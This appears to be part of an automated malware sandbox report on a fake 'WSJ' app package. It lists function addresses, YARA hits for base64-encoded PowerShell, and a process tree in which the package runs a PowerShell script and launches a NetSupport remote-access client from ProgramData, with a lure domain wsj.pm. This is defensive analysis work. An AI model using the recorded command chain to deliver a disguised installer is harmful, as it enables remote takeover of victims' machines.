Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 26_2_00007FF9BB3EE59D	26_2_00007FF9BB3EE59D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 26_2_00007FF9BB3EED9D	26_2_00007FF9BB3EED9D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 26_2_00007FF9BB3F1D9D	26_2_00007FF9BB3F1D9D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 26_2_00007FF9BB3F2D9D	26_2_00007FF9BB3F2D9D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 26_2_00007FF9BB3C6DB1	26_2_00007FF9BB3C6DB1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 26_2_00007FF9BB3CFDAA	26_2_00007FF9BB3CFDAA
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 26_2_00007FF9BB3EADBD	26_2_00007FF9BB3EADBD
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 26_2_00007FF9BB3C95D7	26_2_00007FF9BB3C95D7
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 26_2_00007FF9BB3EBDCB	26_2_00007FF9BB3EBDCB
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 26_2_00007FF9BB3CCD75	26_2_00007FF9BB3CCD75
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 26_2_00007FF9BB3D4D8F	26_2_00007FF9BB3D4D8F
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 26_2_00007FF9BB54647D	26_2_00007FF9BB54647D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 26_2_00007FF9BB541DA1	26_2_00007FF9BB541DA1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 26_2_00007FF9BB546593	26_2_00007FF9BB546593
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 26_2_00007FF9BB6C061E	26_2_00007FF9BB6C061E
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 26_2_00007FF9BB6C45E8	26_2_00007FF9BB6C45E8
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 26_2_00007FF9BB6C8CA0	26_2_00007FF9BB6C8CA0
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 26_2_00007FF9BBB093A2	26_2_00007FF9BBB093A2
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 26_2_00007FF9BBB04B9D	26_2_00007FF9BBB04B9D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 26_2_00007FF9BBB093C5	26_2_00007FF9BBB093C5
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 26_2_00007FF9BBB01AF1	26_2_00007FF9BBB01AF1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 26_2_00007FF9BBB1A282	26_2_00007FF9BBB1A282
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 26_2_00007FF9BBB089E1	26_2_00007FF9BBB089E1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 26_2_00007FF9BBB05007	26_2_00007FF9BBB05007
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 26_2_00007FF9BBB016C0	26_2_00007FF9BBB016C0
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 26_2_00007FF9BBB09E05	26_2_00007FF9BBB09E05
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 26_2_00007FF9BBB03D2C	26_2_00007FF9BBB03D2C
Source: C:\ProgramData\netsupport\client\client32.exe	Code function: 32_2_11029200	32_2_11029200
Source: C:\ProgramData\netsupport\client\client32.exe	Code function: 32_2_110612D0	32_2_110612D0
Source: C:\ProgramData\netsupport\client\client32.exe	Code function: 32_2_110724D0	32_2_110724D0
Source: C:\ProgramData\netsupport\client\client32.exe	Code function: 32_2_1102B1F0	32_2_1102B1F0
Source: C:\ProgramData\netsupport\client\client32.exe	Code function: 32_2_1115B090	32_2_1115B090
Source: C:\ProgramData\netsupport\client\client32.exe	Code function: 32_2_1106F200	32_2_1106F200
Source: C:\ProgramData\netsupport\client\client32.exe	Code function: 32_2_1107F590	32_2_1107F590
Source: C:\ProgramData\netsupport\client\client32.exe	Code function: 32_2_1115F900	32_2_1115F900
Source: C:\ProgramData\netsupport\client\client32.exe	Code function: 32_2_1101B950	32_2_1101B950
Source: C:\ProgramData\netsupport\client\client32.exe	Code function: 32_2_11163B65	32_2_11163B65
Source: C:\ProgramData\netsupport\client\client32.exe	Code function: 32_2_1101BD90	32_2_1101BD90
Source: C:\ProgramData\netsupport\client\client32.exe	Code function: 32_2_110503E0	32_2_110503E0
Source: C:\ProgramData\netsupport\client\client32.exe	Code function: 32_2_1116A6AB	32_2_1116A6AB
Source: C:\ProgramData\netsupport\client\client32.exe	Code function: 32_2_110329A0	32_2_110329A0
Source: C:\ProgramData\netsupport\client\client32.exe	Code function: 32_2_11122860	32_2_11122860
Source: C:\ProgramData\netsupport\client\client32.exe	Code function: 32_2_1100887B	32_2_1100887B
Source: C:\ProgramData\netsupport\client\client32.exe	Code function: 32_2_11044B90	32_2_11044B90
Source: C:\ProgramData\netsupport\client\client32.exe	Code function: 32_2_1101CBB0	32_2_1101CBB0
Source: C:\ProgramData\netsupport\client\client32.exe	Code function: 32_2_11086D60	32_2_11086D60
Source: C:\ProgramData\netsupport\client\client32.exe	Code function: 32_2_6BEBA980	32_2_6BEBA980
Source: C:\ProgramData\netsupport\client\client32.exe	Code function: 32_2_6BEE4910	32_2_6BEE4910
Source: C:\ProgramData\netsupport\client\client32.exe	Code function: 32_2_6BED43C0	32_2_6BED43C0
Source: C:\ProgramData\netsupport\client\client32.exe	Code function: 32_2_6BEE4156	32_2_6BEE4156
Source: C:\ProgramData\netsupport\client\client32.exe	Code function: 32_2_6BEEA063	32_2_6BEEA063
Source: C:\ProgramData\netsupport\client\client32.exe	Code function: 32_2_6BEE4528	32_2_6BEE4528
Source: C:\ProgramData\netsupport\client\client32.exe	Code function: 32_2_6BEC84F0	32_2_6BEC84F0
Source: C:\ProgramData\netsupport\client\client32.exe	Code function: 32_2_6BEBDBA0	32_2_6BEBDBA0
Source: C:\ProgramData\netsupport\client\client32.exe	Code function: 32_2_6BEE3923	32_2_6BEE3923
Source: C:\ProgramData\netsupport\client\client32.exe	Code function: 32_2_6BEE3DB8	32_2_6BEE3DB8
Source: C:\ProgramData\netsupport\client\client32.exe	Code function: 32_2_6BEB1310	32_2_6BEB1310
Source: C:\ProgramData\netsupport\client\client32.exe	Code function: 32_2_6BEB1760	32_2_6BEB1760
Source: C:\ProgramData\netsupport\client\client32.exe	Code function: 32_2_6BEDD70F	32_2_6BEDD70F

Found potential string decryption / allocating functions

Source: C:\ProgramData\netsupport\client\client32.exe	Code function: String function: 110290C0 appears 1044 times
Source: C:\ProgramData\netsupport\client\client32.exe	Code function: String function: 6BED9480 appears 53 times
Source: C:\ProgramData\netsupport\client\client32.exe	Code function: String function: 6BEC7C70 appears 35 times
Source: C:\ProgramData\netsupport\client\client32.exe	Code function: String function: 11142790 appears 584 times
Source: C:\ProgramData\netsupport\client\client32.exe	Code function: String function: 6BEC7A90 appears 59 times
Source: C:\ProgramData\netsupport\client\client32.exe	Code function: String function: 111606A0 appears 32 times
Source: C:\ProgramData\netsupport\client\client32.exe	Code function: String function: 11080CC0 appears 44 times
Source: C:\ProgramData\netsupport\client\client32.exe	Code function: String function: 6BEB6F50 appears 161 times
Source: C:\ProgramData\netsupport\client\client32.exe	Code function: String function: 1116B6F0 appears 37 times
Source: C:\ProgramData\netsupport\client\client32.exe	Code function: String function: 6BEB30A0 appears 48 times
Source: C:\ProgramData\netsupport\client\client32.exe	Code function: String function: 6BEC7D00 appears 132 times
Source: C:\ProgramData\netsupport\client\client32.exe	Code function: String function: 110274F0 appears 47 times
Source: C:\ProgramData\netsupport\client\client32.exe	Code function: String function: 1115CAC3 appears 47 times
Source: C:\ProgramData\netsupport\client\client32.exe	Code function: String function: 1105D350 appears 279 times

Yara signature match

Source: amsi64_7788.amsi.csv, type: OTHER	Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: Process Memory Space: powershell.exe PID: 2564, type: MEMORYSTR	Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: Process Memory Space: powershell.exe PID: 7788, type: MEMORYSTR	Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution

Source: classification engine

Classification label: mal100.rans.evad.win@48/139@21/11

Source: C:\ProgramData\netsupport\client\client32.exe

Code function: 32_2_11059290 GetLastError,FormatMessageA,LocalFree,

32_2_11059290

Source: C:\ProgramData\netsupport\client\client32.exe	Code function: 32_2_1109C580 AdjustTokenPrivileges,FindCloseChangeNotification,		32_2_1109C580
Source: C:\ProgramData\netsupport\client\client32.exe	Code function: 32_2_1109C4F0 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,		32_2_1109C4F0

Source: C:\ProgramData\netsupport\client\client32.exe

Code function: 32_2_11095A00 GetTickCount,CoInitialize,CLSIDFromProgID,CoCreateInstance,CoUninitialize,

32_2_11095A00

Source: C:\ProgramData\netsupport\client\client32.exe

Code function: 32_2_110CC3D0 IsWindow,IsWindowVisible,SetForegroundWindow,FindResourceExA,LoadResource,LockResource,DialogBoxIndirectParamA,DialogBoxParamA,

32_2_110CC3D0

Source: C:\ProgramData\netsupport\client\client32.exe

Code function: 32_2_11124DC0 GetMessageA,Sleep,OpenSCManagerA,DispatchMessageA,OpenServiceA,CloseServiceHandle,StartServiceA,GetLastError,CloseServiceHandle,CloseServiceHandle,GetLastError,CloseServiceHandle,GetLastError,

32_2_11124DC0

Source: C:\Program Files\Google\Chrome\Application\chrome.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2736:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6264:120:WilError_03

Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exe

File created: C:\Users\user\AppData\Local\Packages\microsoft.desktopappinstaller_8wekyb3d8bbwe\AC\Temp\APPX.h150xbbh9hh9t9qrahcglr31d.tmp

Jump to behavior

Source: C:\ProgramData\netsupport\client\client32.exe

File read: C:\ProgramData\netsupport\client\client32.ini

Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: unknown

Process created: C:\Windows\System32\rundll32.exe C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding

Source: unknown	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://wsj.pm/
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2104 --field-trial-handle=2012,i,2892533121597599651,11552435548397906284,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: unknown	Process created: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exe "C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exe" -ServerName:App.AppX9rwyqtrq9gw3wnmrap9a412nsc7145qh.mca
Source: unknown	Process created: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstallerFullTrustAppServiceClient.exe "C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstallerFullTrustAppServiceClient.exe" /InvokerPRAID: App GroupPolicy
Source: unknown	Process created: C:\Program Files\WindowsApps\WSJ_4.12.77.0_x64__v3spfewvfazpe\PsfLauncher64.exe "C:\Program Files\WindowsApps\WSJ_4.12.77.0_x64__v3spfewvfazpe\PsfLauncher64.exe"
Source: C:\Program Files\WindowsApps\WSJ_4.12.77.0_x64__v3spfewvfazpe\PsfLauncher64.exe	Process created: C:\Program Files\WindowsApps\WSJ_4.12.77.0_x64__v3spfewvfazpe\VFS\ProgramFilesX64\PsfRunDll64.exe "PsfRunDll64.exe"
Source: C:\Program Files\WindowsApps\WSJ_4.12.77.0_x64__v3spfewvfazpe\PsfLauncher64.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Powershell.exe -ExecutionPolicy RemoteSigned -file "C:\Program Files\WindowsApps\WSJ_4.12.77.0_x64__v3spfewvfazpe\StartingScriptWrapper.ps1" "Powershell.exe -ExecutionPolicy RemoteSigned -file '.\tOUKLPvSz.ps1'"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy RemoteSigned -file .\tOUKLPvSz.ps1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://www.wsj.com/
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=404 --field-trial-handle=1996,i,16757572502617297566,4553058767684910018,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\ProgramData\netsupport\client\client32.exe "C:\ProgramData\netsupport\client\client32.exe"
Source: unknown	Process created: C:\Windows\System32\rundll32.exe C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
Source: unknown	Process created: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exe "C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exe" -ServerName:App.AppX9rwyqtrq9gw3wnmrap9a412nsc7145qh.mca
Source: unknown	Process created: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstallerFullTrustAppServiceClient.exe "C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstallerFullTrustAppServiceClient.exe" /InvokerPRAID: App GroupPolicy
Source: unknown	Process created: C:\Program Files\WindowsApps\WSJ_4.12.77.0_x64__v3spfewvfazpe\PsfLauncher64.exe "C:\Program Files\WindowsApps\WSJ_4.12.77.0_x64__v3spfewvfazpe\PsfLauncher64.exe"
Source: C:\Program Files\WindowsApps\WSJ_4.12.77.0_x64__v3spfewvfazpe\PsfLauncher64.exe	Process created: C:\Program Files\WindowsApps\WSJ_4.12.77.0_x64__v3spfewvfazpe\VFS\ProgramFilesX64\PsfRunDll64.exe "PsfRunDll64.exe"
Source: C:\Program Files\WindowsApps\WSJ_4.12.77.0_x64__v3spfewvfazpe\PsfLauncher64.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Powershell.exe -ExecutionPolicy RemoteSigned -file "C:\Program Files\WindowsApps\WSJ_4.12.77.0_x64__v3spfewvfazpe\StartingScriptWrapper.ps1" "Powershell.exe -ExecutionPolicy RemoteSigned -file '.\tOUKLPvSz.ps1'"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy RemoteSigned -file .\tOUKLPvSz.ps1
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2104 --field-trial-handle=2012,i,2892533121597599651,11552435548397906284,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\WindowsApps\WSJ_4.12.77.0_x64__v3spfewvfazpe\PsfLauncher64.exe	Process created: C:\Program Files\WindowsApps\WSJ_4.12.77.0_x64__v3spfewvfazpe\VFS\ProgramFilesX64\PsfRunDll64.exe "PsfRunDll64.exe"	Jump to behavior
Source: C:\Program Files\WindowsApps\WSJ_4.12.77.0_x64__v3spfewvfazpe\PsfLauncher64.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Powershell.exe -ExecutionPolicy RemoteSigned -file "C:\Program Files\WindowsApps\WSJ_4.12.77.0_x64__v3spfewvfazpe\StartingScriptWrapper.ps1" "Powershell.exe -ExecutionPolicy RemoteSigned -file '.\tOUKLPvSz.ps1'"	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy RemoteSigned -file .\tOUKLPvSz.ps1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://www.wsj.com/	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\ProgramData\netsupport\client\client32.exe "C:\ProgramData\netsupport\client\client32.exe"	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=404 --field-trial-handle=1996,i,16757572502617297566,4553058767684910018,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Program Files\WindowsApps\WSJ_4.12.77.0_x64__v3spfewvfazpe\PsfLauncher64.exe	Process created: C:\Program Files\WindowsApps\WSJ_4.12.77.0_x64__v3spfewvfazpe\VFS\ProgramFilesX64\PsfRunDll64.exe "PsfRunDll64.exe"
Source: C:\Program Files\WindowsApps\WSJ_4.12.77.0_x64__v3spfewvfazpe\PsfLauncher64.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Powershell.exe -ExecutionPolicy RemoteSigned -file "C:\Program Files\WindowsApps\WSJ_4.12.77.0_x64__v3spfewvfazpe\StartingScriptWrapper.ps1" "Powershell.exe -ExecutionPolicy RemoteSigned -file '.\tOUKLPvSz.ps1'"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy RemoteSigned -file .\tOUKLPvSz.ps1

Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exe	Section loaded: msvcp140.dll	Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exe	Section loaded: concrt140.dll	Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exe	Section loaded: vcruntime140.dll	Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exe	Section loaded: vcruntime140_1.dll	Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exe	Section loaded: vcruntime140_1.dll	Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exe	Section loaded: vcruntime140.dll	Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exe	Section loaded: windows.ui.xaml.dll	Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exe	Section loaded: dcomp.dll	Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exe	Section loaded: windows.storage.applicationdata.dll	Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exe	Section loaded: twinapi.appcore.dll	Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exe	Section loaded: rometadata.dll	Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exe	Section loaded: windows.staterepositorycore.dll	Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exe	Section loaded: windows.ui.dll	Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exe	Section loaded: windowmanagementapi.dll	Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exe	Section loaded: inputhost.dll	Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exe	Section loaded: dxgi.dll	Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exe	Section loaded: resourcepolicyclient.dll	Jump to behavior
